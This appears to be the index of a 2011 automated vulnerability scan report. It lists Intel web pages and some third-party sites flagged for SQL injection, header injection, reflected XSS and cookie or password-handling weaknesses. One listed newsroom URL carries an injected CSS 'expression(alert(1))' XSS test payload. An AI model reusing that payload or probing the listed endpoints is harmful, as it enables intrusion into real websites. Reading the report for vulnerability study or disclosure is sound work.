Intel Web System Example, Cross Site Scripting, XSS, CWE-79, CAPEC-86

XSs in INTC HTTP Systems | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 08:56:57 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://6418dc.r.axf8.net/mr/a.gif [a parameter]

1.2. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 1]

1.3. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 3]

1.4. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 6]

2. XPath injection

3. HTTP header injection

3.1. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

3.2. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

3.3. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

3.4. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

3.5. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

3.6. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

3.7. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

3.8. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

3.9. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://digg.com/submit [REST URL parameter 1]

4.2. http://inside.intel.com/LOPFeedMashup [SN parameter]

4.3. http://inside.intel.com/LOPSPFeedMashup [SN1 parameter]

4.4. http://inside.intel.com/LOPSPFeedMashup [SN2 parameter]

4.5. http://inside.intel.com/LOPSPFeedMashup [SN3 parameter]

4.6. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

4.7. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

4.8. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.9. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.10. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.11. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

4.12. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

4.13. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.14. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.15. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]

4.16. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml [Referer HTTP header]

4.17. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 10]

4.18. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]

4.19. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 3]

4.20. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 4]

4.21. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 5]

4.22. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 6]

4.23. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 7]

4.24. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 8]

4.25. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 9]

4.26. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 10]

4.27. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

4.28. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 3]

4.29. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 4]

4.30. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 5]

4.31. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 6]

4.32. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 7]

4.33. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 8]

4.34. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 9]

4.35. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 10]

4.36. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

4.37. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 3]

4.38. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 4]

4.39. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 5]

4.40. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 6]

4.41. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 7]

4.42. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 8]

4.43. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 9]

4.44. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 10]

4.45. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

4.46. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 3]

4.47. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 4]

4.48. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 5]

4.49. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 6]

4.50. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 7]

4.51. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 8]

4.52. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 9]

4.53. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 10]

4.54. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]

4.55. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 3]

4.56. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 4]

4.57. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 5]

4.58. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 6]

4.59. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 7]

4.60. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 8]

4.61. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 9]

4.62. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 10]

4.63. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]

4.64. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 3]

4.65. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 4]

4.66. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 5]

4.67. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 6]

4.68. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 7]

4.69. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 8]

4.70. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 9]

4.71. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 10]

4.72. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

4.73. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 3]

4.74. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 4]

4.75. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 5]

4.76. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 6]

4.77. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 7]

4.78. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 8]

4.79. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 9]

4.80. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 10]

4.81. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

4.82. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 3]

4.83. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 4]

4.84. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 5]

4.85. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 6]

4.86. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 7]

4.87. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 8]

4.88. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 9]

4.89. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 10]

4.90. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

4.91. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 3]

4.92. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 4]

4.93. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 5]

4.94. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 6]

4.95. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 7]

4.96. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 8]

4.97. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 9]

4.98. http://www.intel.com/pressroom/index.htm [iid parameter]

4.99. http://www.intel.com/pressroom/index.htm [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://i.ytimg.com/crossdomain.xml

5.2. http://gdata.youtube.com/crossdomain.xml

5.3. http://www.facebook.com/crossdomain.xml

5.4. http://www.intel.com/crossdomain.xml

6. Cleartext submission of password

6.1. http://digg.com/submit

6.2. http://www.ericmmartin.com/projects/simplemodal/

6.3. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

6.4. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

7. SQL statement in request parameter

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

9.2. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

9.3. http://www.intel.com/references/index.htm

10. Password field submitted using GET method

11. Cookie scoped to parent domain

11.1. http://communities.intel.com/community/openportit/server

11.2. http://communities.intel.com/community/openportit/vproexpert

11.3. http://communities.intel.com/community/tech

11.4. http://communities.intel.com/community/tech/desktop

11.5. http://communities.intel.com/index.jspa

11.6. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

11.7. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

11.8. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

11.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

11.10. http://newsroom.intel.com/4.0.6/styles/jive-community.css

11.11. http://newsroom.intel.com/4.0.6/styles/jive-global.css

11.12. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

11.13. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

11.14. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

11.15. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

11.16. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

11.17. http://newsroom.intel.com/community/intel_newsroom/

11.18. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

11.19. http://newsroom.intel.com/render-widget!execute.jspa

11.20. http://newsroom.intel.com/theme/white/styles/theme.css

11.21. https://secure-newsroom.intel.com/cs_login

11.22. http://software.intel.com/en-us/

11.23. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

11.24. http://software.intel.com/en-us/blogs/

11.25. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

11.26. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

11.27. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

11.28. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

11.29. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

11.30. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

11.31. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

11.32. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

11.33. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

11.34. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

11.35. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

11.36. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

11.37. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

11.38. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

11.39. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

11.40. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

11.41. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

11.42. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

11.43. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

11.44. http://software.intel.com/sites/academic_showcase/

11.45. http://www.opensource.org/licenses/mit-license.php

11.46. http://www.sigcse.org/

11.47. http://code.google.com/p/simplemodal/

11.48. http://code.google.com/p/swfobject/

11.49. http://m.youtube.com/details

11.50. http://www.facebook.com/Intel

11.51. http://www.facebook.com/sharer.php

11.52. http://www.flickr.com/apps/slideshow/show.swf

11.53. http://www.flickr.com/photos/intelphotos

11.54. http://www.youtube.com/channelintel

11.55. http://www.youtube.com/view_play_list

11.56. http://www.youtube.com/watch

11.57. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

12. Cookie without HttpOnly flag set

12.1. http://appdeveloper.intel.com/

12.2. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

12.3. http://communities.intel.com/community/openportit/server

12.4. http://communities.intel.com/community/openportit/vproexpert

12.5. http://communities.intel.com/community/tech

12.6. http://communities.intel.com/community/tech/desktop

12.7. http://communities.intel.com/index.jspa

12.8. http://flesler.demos.com/jquery/scrollTo/

12.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/0e7c6c42e74b788f13ba0b4d8d125742.js

12.10. http://newsroom.intel.com/4.0.6/resources/scripts/gen/9c1c89344c1b0004e51eeeeed7553a8e.js

12.11. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

12.12. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

12.13. http://newsroom.intel.com/4.0.6/styles/jive-community.css

12.14. http://newsroom.intel.com/4.0.6/styles/jive-global.css

12.15. http://newsroom.intel.com/4.0.6/styles/jive-icons.css

12.16. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css

12.17. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css

12.18. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css

12.19. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

12.20. http://newsroom.intel.com/community/intel_newsroom/

12.21. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

12.22. http://newsroom.intel.com/render-widget!execute.jspa

12.23. http://newsroom.intel.com/theme/white/styles/theme.css

12.24. http://onsite2.researchintel.com/engine/icorescript.asp

12.25. http://plugins.jquery.com/project/SimpleModal

12.26. https://secure-newsroom.intel.com/cs_login

12.27. http://software.intel.com/en-us/

12.28. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

12.29. http://software.intel.com/en-us/blogs/

12.30. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

12.31. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

12.32. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

12.33. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

12.34. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

12.35. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

12.36. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

12.37. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

12.38. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

12.39. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

12.40. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

12.41. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

12.42. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

12.43. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

12.44. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

12.45. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

12.46. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

12.47. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

12.48. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

12.49. http://software.intel.com/sites/academic_showcase/

12.50. http://twitter.com/EricMMartin

12.51. http://twitter.com/intel

12.52. http://twitter.com/intelnews

12.53. http://twitter.com/share

12.54. http://www.intc.com/

12.55. http://www.intc.com/alerts.cfm

12.56. http://www.intc.com/analystCenter.cfm

12.57. http://www.intc.com/annuals.cfm

